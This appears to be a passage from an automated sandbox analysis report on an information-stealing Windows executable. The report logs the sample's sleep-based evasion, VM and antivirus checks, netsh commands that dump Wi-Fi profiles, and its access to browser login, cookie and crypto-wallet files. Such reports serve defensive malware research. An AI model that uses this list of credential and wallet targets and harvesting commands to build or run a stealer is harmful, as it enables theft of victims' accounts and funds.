                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeThread delayed: delay time: 597672Jump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeThread delayed: delay time: 597562Jump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeThread delayed: delay time: 597453Jump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeThread delayed: delay time: 597343Jump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeThread delayed: delay time: 597234Jump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeThread delayed: delay time: 597125Jump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeThread delayed: delay time: 597012Jump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeThread delayed: delay time: 596905Jump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeThread delayed: delay time: 596789Jump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeThread delayed: delay time: 596534Jump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeThread delayed: delay time: 596382Jump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeThread delayed: delay time: 596266Jump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeThread delayed: delay time: 596156Jump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeThread delayed: delay time: 596046Jump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeThread delayed: delay time: 595937Jump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeThread delayed: delay time: 595828Jump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeThread delayed: delay time: 595719Jump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeThread delayed: delay time: 595594Jump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeThread delayed: delay time: 595484Jump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeThread delayed: delay time: 595374Jump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeThread delayed: delay time: 595250Jump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeThread delayed: delay time: 595139Jump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeThread delayed: delay time: 595031Jump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeThread delayed: delay time: 594922Jump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeThread delayed: delay time: 594797Jump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeThread delayed: delay time: 594688Jump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeThread delayed: delay time: 594563Jump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeThread delayed: delay time: 594453Jump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeThread delayed: delay time: 594344Jump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeThread delayed: delay time: 594219Jump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeThread delayed: delay time: 594109Jump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeThread delayed: delay time: 594000Jump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeThread delayed: delay time: 593888Jump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeWindow / User API: threadDelayed 2561Jump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeWindow / User API: threadDelayed 7278Jump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exe TID: 7964Thread sleep time: -28592453314249787s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exe TID: 7964Thread sleep time: -600000s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exe TID: 7964Thread sleep time: -599875s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exe TID: 7964Thread sleep time: -599766s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exe TID: 7964Thread sleep time: -599651s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exe TID: 7964Thread sleep time: -599544s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exe TID: 7964Thread sleep time: -599250s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exe TID: 7964Thread sleep time: -599099s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exe TID: 7964Thread sleep time: -598984s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exe TID: 7964Thread sleep time: -598875s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exe TID: 7964Thread sleep time: -598766s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exe TID: 7964Thread sleep time: -598656s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exe TID: 7964Thread sleep time: -598547s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exe TID: 7964Thread sleep time: -598438s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exe TID: 7964Thread sleep time: -598325s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exe TID: 7964Thread sleep time: -598219s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exe TID: 7964Thread sleep time: -598109s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exe TID: 7964Thread sleep time: -598000s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exe TID: 7964Thread sleep time: -597891s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exe TID: 7964Thread sleep time: -597781s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exe TID: 7964Thread sleep time: -597672s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exe TID: 7964Thread sleep time: -597562s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exe TID: 7964Thread sleep time: -597453s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exe TID: 7964Thread sleep time: -597343s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exe TID: 7964Thread sleep time: -597234s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exe TID: 7964Thread sleep time: -597125s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exe TID: 7964Thread sleep time: -597012s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exe TID: 7964Thread sleep time: -596905s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exe TID: 7964Thread sleep time: -596789s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exe TID: 7964Thread sleep time: -596534s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exe TID: 7964Thread sleep time: -596382s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exe TID: 7964Thread sleep time: -596266s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exe TID: 7964Thread sleep time: -596156s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exe TID: 7964Thread sleep time: -596046s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exe TID: 7964Thread sleep time: -595937s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exe TID: 7964Thread sleep time: -595828s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exe TID: 7964Thread sleep time: -595719s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exe TID: 7964Thread sleep time: -595594s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exe TID: 7964Thread sleep time: -595484s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exe TID: 7964Thread sleep time: -595374s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exe TID: 7964Thread sleep time: -595250s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exe TID: 7964Thread sleep time: -595139s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exe TID: 7964Thread sleep time: -595031s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exe TID: 7964Thread sleep time: -594922s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exe TID: 7964Thread sleep time: -594797s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exe TID: 7964Thread sleep time: -594688s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exe TID: 7964Thread sleep time: -594563s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exe TID: 7964Thread sleep time: -594453s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exe TID: 7964Thread sleep time: -594344s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exe TID: 7964Thread sleep time: -594219s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exe TID: 7964Thread sleep time: -594109s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exe TID: 7964Thread sleep time: -594000s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exe TID: 7964Thread sleep time: -593888s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * From Win32_ComputerSystem
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select ProcessorId From Win32_processor
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeThread delayed: delay time: 600000Jump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeThread delayed: delay time: 599875Jump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeThread delayed: delay time: 599766Jump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeThread delayed: delay time: 599651Jump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeThread delayed: delay time: 599544Jump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeThread delayed: delay time: 599250Jump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeThread delayed: delay time: 599099Jump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeThread delayed: delay time: 598984Jump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeThread delayed: delay time: 598875Jump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeThread delayed: delay time: 598766Jump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeThread delayed: delay time: 598656Jump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeThread delayed: delay time: 598547Jump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeThread delayed: delay time: 598438Jump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeThread delayed: delay time: 598325Jump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeThread delayed: delay time: 598219Jump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeThread delayed: delay time: 598109Jump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeThread delayed: delay time: 598000Jump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeThread delayed: delay time: 597891Jump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeThread delayed: delay time: 597781Jump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeThread delayed: delay time: 597672Jump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeThread delayed: delay time: 597562Jump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeThread delayed: delay time: 597453Jump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeThread delayed: delay time: 597343Jump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeThread delayed: delay time: 597234Jump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeThread delayed: delay time: 597125Jump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeThread delayed: delay time: 597012Jump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeThread delayed: delay time: 596905Jump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeThread delayed: delay time: 596789Jump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeThread delayed: delay time: 596534Jump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeThread delayed: delay time: 596382Jump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeThread delayed: delay time: 596266Jump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeThread delayed: delay time: 596156Jump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeThread delayed: delay time: 596046Jump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeThread delayed: delay time: 595937Jump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeThread delayed: delay time: 595828Jump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeThread delayed: delay time: 595719Jump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeThread delayed: delay time: 595594Jump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeThread delayed: delay time: 595484Jump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeThread delayed: delay time: 595374Jump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeThread delayed: delay time: 595250Jump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeThread delayed: delay time: 595139Jump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeThread delayed: delay time: 595031Jump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeThread delayed: delay time: 594922Jump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeThread delayed: delay time: 594797Jump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeThread delayed: delay time: 594688Jump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeThread delayed: delay time: 594563Jump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeThread delayed: delay time: 594453Jump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeThread delayed: delay time: 594344Jump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeThread delayed: delay time: 594219Jump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeThread delayed: delay time: 594109Jump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeThread delayed: delay time: 594000Jump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeThread delayed: delay time: 593888Jump to behavior
                              Source: tmpA74A.tmp.dat.0.drBinary or memory string: dev.azure.comVMware20,11696497155j
                              Source: tmpA74A.tmp.dat.0.drBinary or memory string: global block list test formVMware20,11696497155
                              Source: tmpA74A.tmp.dat.0.drBinary or memory string: turbotax.intuit.comVMware20,11696497155t
                              Source: tmpA74A.tmp.dat.0.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696497155
                              Source: tmpA74A.tmp.dat.0.drBinary or memory string: Interactive Brokers - HKVMware20,11696497155]
                              Source: tmpA74A.tmp.dat.0.drBinary or memory string: secure.bankofamerica.comVMware20,11696497155|UE
                              Source: tmpA74A.tmp.dat.0.drBinary or memory string: tasks.office.comVMware20,11696497155o
                              Source: tmpA74A.tmp.dat.0.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696497155
                              Source: tmpA74A.tmp.dat.0.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696497155
                              Source: cOH7jKmo25.exe, 00000000.00000002.2569585883.0000000005228000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                              Source: tmpA74A.tmp.dat.0.drBinary or memory string: bankofamerica.comVMware20,11696497155x
                              Source: tmpA74A.tmp.dat.0.drBinary or memory string: ms.portal.azure.comVMware20,11696497155
                              Source: tmpA74A.tmp.dat.0.drBinary or memory string: trackpan.utiitsl.comVMware20,11696497155h
                              Source: tmpA74A.tmp.dat.0.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696497155p
                              Source: tmpA74A.tmp.dat.0.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696497155n
                              Source: tmpA74A.tmp.dat.0.drBinary or memory string: interactivebrokers.co.inVMware20,11696497155d
                              Source: tmpA74A.tmp.dat.0.drBinary or memory string: Canara Transaction PasswordVMware20,11696497155x
                              Source: tmpA74A.tmp.dat.0.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696497155
                              Source: cOH7jKmo25.exeBinary or memory string: vmware
                              Source: tmpA74A.tmp.dat.0.drBinary or memory string: interactivebrokers.comVMware20,11696497155
                              Source: tmpA74A.tmp.dat.0.drBinary or memory string: AMC password management pageVMware20,11696497155
                              Source: tmpA74A.tmp.dat.0.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696497155
                              Source: tmpA74A.tmp.dat.0.drBinary or memory string: Canara Transaction PasswordVMware20,11696497155}
                              Source: tmpA74A.tmp.dat.0.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696497155^
                              Source: tmpA74A.tmp.dat.0.drBinary or memory string: account.microsoft.com/profileVMware20,11696497155u
                              Source: tmpA74A.tmp.dat.0.drBinary or memory string: discord.comVMware20,11696497155f
                              Source: tmpA74A.tmp.dat.0.drBinary or memory string: netportal.hdfcbank.comVMware20,11696497155
                              Source: cOH7jKmo25.exeBinary or memory string: VMwareVBox
                              Source: tmpA74A.tmp.dat.0.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696497155z
                              Source: tmpA74A.tmp.dat.0.drBinary or memory string: outlook.office365.comVMware20,11696497155t
                              Source: tmpA74A.tmp.dat.0.drBinary or memory string: outlook.office.comVMware20,11696497155s
                              Source: tmpA74A.tmp.dat.0.drBinary or memory string: www.interactivebrokers.comVMware20,11696497155}
                              Source: tmpA74A.tmp.dat.0.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696497155~
                              Source: tmpA74A.tmp.dat.0.drBinary or memory string: microsoft.visualstudio.comVMware20,11696497155x
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeProcess information queried: ProcessInformationJump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeCode function: 0_2_05960B20 LdrInitializeThunk,0_2_05960B20
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeProcess token adjusted: DebugJump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeMemory allocated: page read and write | page guardJump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr AllJump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssidJump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001Jump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profileJump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr AllJump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001Jump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show networks mode=bssidJump to behavior

                              Language, Device and Operating System Detection

                              barindex
                              Source: Yara matchFile source: cOH7jKmo25.exe, type: SAMPLE
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion DigitalProductIdJump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeQueries volume information: C:\Users\user\Desktop\cOH7jKmo25.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                              Lowering of HIPS / PFW / Operating System Security Settings

                              barindex
                              Source: Yara matchFile source: cOH7jKmo25.exe, type: SAMPLE
                              Source: Yara matchFile source: 0.0.cOH7jKmo25.exe.7e0000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000000.00000000.1315479015.00000000007E2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: cOH7jKmo25.exe PID: 7540, type: MEMORYSTR
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile
                              Source: cOH7jKmo25.exe, 00000000.00000002.2569854785.0000000005284000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

                              Stealing of Sensitive Information

                              barindex
                              Source: Yara matchFile source: cOH7jKmo25.exe, type: SAMPLE
                              Source: Yara matchFile source: 0.0.cOH7jKmo25.exe.7e0000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000000.00000000.1315479015.00000000007E2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000000.00000002.2566383997.0000000002B61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: cOH7jKmo25.exe PID: 7540, type: MEMORYSTR
                              Source: Yara matchFile source: cOH7jKmo25.exe, type: SAMPLE
                              Source: Yara matchFile source: 0.0.cOH7jKmo25.exe.7e0000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000000.00000000.1315479015.00000000007E2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: cOH7jKmo25.exe PID: 7540, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: cOH7jKmo25.exe PID: 7540, type: MEMORYSTR
                              Source: cOH7jKmo25.exe, 00000000.00000002.2566383997.0000000002B61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Electrum
                              Source: cOH7jKmo25.exe, 00000000.00000002.2566383997.0000000002B61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: q5\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb
                              Source: cOH7jKmo25.exe, 00000000.00000002.2566383997.0000000002B61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: \Exodus\exodus.wallet
                              Source: cOH7jKmo25.exe, 00000000.00000002.2566383997.0000000002B61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: \Ethereum\keystore
                              Source: cOH7jKmo25.exe, 00000000.00000002.2566383997.0000000002B61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Exodus
                              Source: cOH7jKmo25.exe, 00000000.00000002.2566383997.0000000002B61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Ethereum
                              Source: cOH7jKmo25.exe, 00000000.00000002.2566383997.0000000002B61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: \Coinomi\Coinomi\wallets
                              Source: cOH7jKmo25.exe, 00000000.00000002.2566383997.0000000002B61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: \Ethereum\keystore
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr AllJump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profileJump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\places.sqliteJump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cookies.sqliteJump to behavior
                              Source: Yara matchFile source: cOH7jKmo25.exe, type: SAMPLE
                              Source: Yara matchFile source: 0.0.cOH7jKmo25.exe.7e0000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000000.00000000.1315479015.00000000007E2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000000.00000002.2566383997.0000000002B61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: cOH7jKmo25.exe PID: 7540, type: MEMORYSTR

                              Remote Access Functionality

                              barindex
                              Source: Yara matchFile source: cOH7jKmo25.exe, type: SAMPLE
                              Source: Yara matchFile source: 0.0.cOH7jKmo25.exe.7e0000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000000.00000000.1315479015.00000000007E2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000000.00000002.2566383997.0000000002B61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: cOH7jKmo25.exe PID: 7540, type: MEMORYSTR
                              Source: Yara matchFile source: cOH7jKmo25.exe, type: SAMPLE
                              Source: Yara matchFile source: 0.0.cOH7jKmo25.exe.7e0000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000000.00000000.1315479015.00000000007E2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
